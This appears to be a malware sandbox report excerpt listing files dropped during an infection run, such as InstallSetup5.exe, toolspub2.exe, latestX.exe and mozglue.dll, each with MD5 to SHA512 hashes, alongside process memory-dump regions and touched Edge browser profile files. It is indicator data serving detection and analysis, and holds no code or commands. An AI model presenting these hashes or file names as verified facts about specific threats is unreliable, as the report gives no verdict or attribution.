C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3f8b943d4de750d757b7334d934daed
SHA1 5155f85b6315bae947da989f064b877d1b37e323
SHA256 787ba7c3d0cff12db1ebf014cfd39ac6cd28a3ce9aa1a9c5b72db7d0b48bf358
SHA512 b001f9de30322157666cea1923a886689244964c2acdc1c9bfe0e83508446791ad1b3fa0ca85a026f1f1c7631b3633f5c818219b93119b0f386ae3adbff3190e

memory/5596-695-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5596-696-0x00000000004B0000-0x000000000114C000-memory.dmp

memory/3948-700-0x000001F8AE520000-0x000001F8AE60E000-memory.dmp

memory/7780-702-0x0000000006970000-0x00000000069E6000-memory.dmp

memory/3948-704-0x000001F8C8A60000-0x000001F8C8B40000-memory.dmp

memory/3948-703-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/3948-705-0x000001F8C8B80000-0x000001F8C8B90000-memory.dmp

memory/3948-706-0x000001F8C8C00000-0x000001F8C8CE0000-memory.dmp

memory/7780-708-0x0000000006A20000-0x0000000006BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 f13cf6c130d41595bc96be10a737cb18
SHA1 6b14ea97930141aa5caaeeeb13dd4c6dad55d102
SHA256 dd7aaf7ef0e5b3797eaf5182e7b192fa014b735e129e00e0c662829ce0c2515f
SHA512 ccd4f57b1af1f348fcf9f519a4789c04b499ac5e02ccb7333d0a42fa1cb1fdf9f969103b3a5467e278cd5c6cbbbbebaac4577d0c220e13335575a13408c79b48

memory/3948-712-0x000001F8C8CE0000-0x000001F8C8DA8000-memory.dmp

memory/7780-713-0x00000000089D0000-0x0000000008EFC000-memory.dmp

memory/3948-716-0x000001F8C8EB0000-0x000001F8C8F78000-memory.dmp

memory/7780-724-0x0000000008FA0000-0x0000000008FBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6f38e2c344007fa6c5a609f3baa82894
SHA1 9296d861ae076ebddac76b490c2e56fcd0d63c6d
SHA256 fb1b0639a3bdd51f914bf71948d88555e1bbb9de0937f8fa94e7aa38a8d6ab9f
SHA512 5432ab0139ee88a7b509d60ed39d3b69f7c38fe94613b3d72cc4480112d95b2cbf7652438801e7e7956aca73d6ebc870851814bec0082f4d77737a024990e059

memory/3948-726-0x000001F8C8F80000-0x000001F8C8FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 a98f00f0876312e7f85646d2e4fe9ded
SHA1 5d6650725d89fea37c88a0e41b2486834a8b7546
SHA256 787892fff0e39d65ccf86bb7f945be728287aaf80064b7acc84b9122e49d54e6
SHA512 f5ca9ec79d5639c06727dd106e494a39f12de150fbfbb0461d5679aed6a137b3781eedf51beaf02b61d183991d8bca4c08a045a83412525d1e28283856fa3802

C:\Users\Admin\AppData\Local\Temp\forc.exe

MD5 02d1af12b47621a72f44d2ae6bb70e37
SHA1 4e0cc70c068e55cd502d71851decb96080861101
SHA256 8d2a83ac263e56c2c058d84f67e23db8fe651b556423318f17389c2780351318
SHA512 ecf9114bbac62c81457f90a6d1c845901ece21e36ca602a79ba6c33f76a1117162175f0ace8ae6c2bdc9f962bd797ab9393316238adbc3b40a9b948d3c98582c

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2896-749-0x00000000002C0000-0x00000000004ED000-memory.dmp

memory/7964-752-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/7780-750-0x0000000009250000-0x00000000092A0000-memory.dmp

memory/5596-754-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5168-755-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/5168-758-0x000002BB5E020000-0x000002BB5E104000-memory.dmp

memory/3948-760-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/7780-759-0x00000000076E0000-0x00000000076F0000-memory.dmp

memory/7780-757-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5168-761-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/5168-762-0x000002BB5E1D0000-0x000002BB5E1E0000-memory.dmp

memory/5168-763-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-764-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-766-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-768-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-770-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-772-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-774-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-776-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-782-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-784-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-787-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/2896-786-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/5168-791-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-795-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-799-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-803-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-807-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-811-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 02da3f1025dbc1d54f9ddd4d1ff36a00
SHA1 4bbd7ef89566b1b480b7e8245aaeecb5aae6a607
SHA256 1a8b93f9a9a51b3860a1e5355b527de3f47f8ec97483dacc09fa2f40d576f11b
SHA512 d265ebed62a6deea461c3307015b1047075a8a0e0dc60d5e3e25cf3dbc0dc227f9afeecad7464d7d92de74c5908258d5e42d14e9f9403e3bfd011bc8c65d372c

memory/6468-931-0x00000000008F0000-0x00000000009F0000-memory.dmp

memory/5188-936-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6468-933-0x00000000008E0000-0x00000000008E9000-memory.dmp

memory/5188-938-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6588-961-0x0000000002A70000-0x0000000002E6B000-memory.dmp

memory/6588-963-0x0000000002E70000-0x000000000375B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b7f4e771e47e6fd5fc052a6fafce4346
SHA1 57befedb38a9df96c0edb7325c242a2b766fea34
SHA256 e7424b03140ddbfb8ede29f1e834401e32456a2b04c43a40d6d4c273a3f6aaa7
SHA512 8a033aa8fa9c565fd10630942929298ca628e04799b4bfd63b4b96fb46e26c3c45e7999cbed0a277d7604e518e6565f1e783073a74d77c288b80a83afc67e7ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 33d8b2532cc0687be454ee06c69ca651
SHA1 2a9a021ca672d3a51294295a722ed1c8424528cb
SHA256 bf29e2008cbb872e4e391123765241f3d1330e72775acfe02ae978be7178fbf9
SHA512 ce7a582525bb5c9230511812e81f7f5133e56dfa290128f6b330491b8afb519823f73f4e399280208bd08033857fa28484ceba19fa4952d2aad75be7e8f0ac78

memory/6588-980-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2896-1075-0x00000000002C0000-0x00000000004ED000-memory.dmp

memory/5188-1125-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25189300c19c8d07d07f0ec5b9ac8df0
SHA1 8c38360db6ac069df9f203b225348ac699f020b7
SHA256 80664f48abed2305dc6c625d5faabd9c6cfb91a495b3978799e29f6c686a85f6
SHA512 8ba104d264ba9f10b6c60a2a51e0fb6ded1555acca091d16899f49da1635d4372ff5c8813dc02abb0732dce6c0d529708938abd54e2fcf24cd04fb9f7301f862

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cd57206d74e68e1f70796d0fda0bf24a
SHA1 dbdcb840eae95928031d3e99994d2cdf651ec85b
SHA256 8af9526122c3e5f3d3840c5442672e5c2240c09ed4b01d7252e931c770fbe196
SHA512 1d2b643233f4ec20715020c18fb795eb2648125462e0bfe557c991a0e0048d71c85570e37f45a20c38bc88f1f4141c6e24b1da904af08eb3ec8d21305ad5583c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 523bee478988a73e62327ac11710ca7e
SHA1 d0efba139764d7b58c2ae126f501214c5dfa6e46
SHA256 9dc5f36219119b3a797141ebe4bb708c3a72edc196bca5aceccbcb7802f08368
SHA512 0c98c9c4fcca83217c270f4ec119d1cc067654b9f4e6f1ab9df28d8fad670d4b82157c138b754ab9520a737531128f521dae58f6e0580b2640e568f9dbb69a0d

memory/7780-1379-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/6188-1419-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/6188-1426-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

memory/6188-1433-0x000002B7E3340000-0x000002B7E3362000-memory.dmp

memory/6188-1431-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

memory/7964-1437-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/5168-1439-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpe1cgy1.snl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5168-1474-0x000002BB5E1D0000-0x000002BB5E1E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 58173fe330dd8c955c92d550bb196891
SHA1 646889a75fd8679d0a69df9ddf7a22b73437eb6c
SHA256 fac8f0f082b3f1cc7f84f846e3a3d87c45c65811581dce0aac495b92ca61ef20
SHA512 fd50e563ae905c0daf31c8cfa551a53eca7dfce5dda46b3b03b87e6182bad73cc9d7e6f6dd33bbcc7070ea8c803806392d67762484df4ba3459afa92a9cf4436

memory/6188-1530-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4216c7006058513a55cffc852b757373
SHA1 200602647bdf3a64dcab32b90ed0ac3640fe99e0
SHA256 680bf1a1085b72e9e87dd4614903ed7668302169ccdecf1f1a4aa4c5875aca52
SHA512 f73233d141d2f36641d79eca39e4a68373216f4c6c2670b15595c2cbfebf23dd510dbd3d2155edc9178fab414d317a97aa70f8576ff8f4cdbbb68ed06be5ea45

memory/5336-1606-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5336-1610-0x0000000004690000-0x00000000046C6000-memory.dmp

memory/6588-1613-0x0000000002A70000-0x0000000002E6B000-memory.dmp

memory/5336-1616-0x0000000004680000-0x0000000004690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3